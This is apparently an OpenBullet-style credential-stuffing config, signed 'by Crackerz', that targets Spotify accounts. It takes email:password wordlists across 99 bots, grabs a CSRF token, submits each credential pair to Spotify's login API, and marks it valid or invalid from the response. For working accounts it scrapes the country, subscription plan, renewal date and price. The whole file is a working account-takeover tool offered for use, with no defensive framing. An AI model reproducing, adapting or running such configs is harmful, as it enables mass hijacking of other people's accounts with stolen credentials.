[SETTINGS]
{
  "Name": "Spotify.Api_Config",
  "SuggestedBots": 99,
  "LastModified": "2019-04-18T19:02:09.9591624+02:00",
  "AdditionalInfo": "",
  "Author": "by Crackerz",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#PARSE_Token PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "CSRF" 
#Login REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"displayName\":\"" 
  KEYCHAIN Failure OR 
    KEY "{\"error\":\"errorInvalidCredentials\"}" 
#REQUEST_Info REQUEST GET "https://www.spotify.com/us/account/overview/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "currently Spotify Free. " 
#Capture_Country PARSE "<SOURCE>" LR "card-profile-country\">" "<" -> CAP "Country" 
#Capture_Subscription PARSE "<SOURCE>" LR "<h3 class=\"product-name\">" "<" -> CAP "Subscription" 
#Automatically_renew PARSE "<SOURCE>" LR "<b class=\"recurring-date\">" "<" -> CAP "recurring-date" 
#Recurring_price PARSE "<SOURCE>" LR "<b class=\"recurring-price\">" "<" -> CAP "recurring-price" 
FUNCTION Constant "Config-by Crackerz" -> CAP "Spotify" 
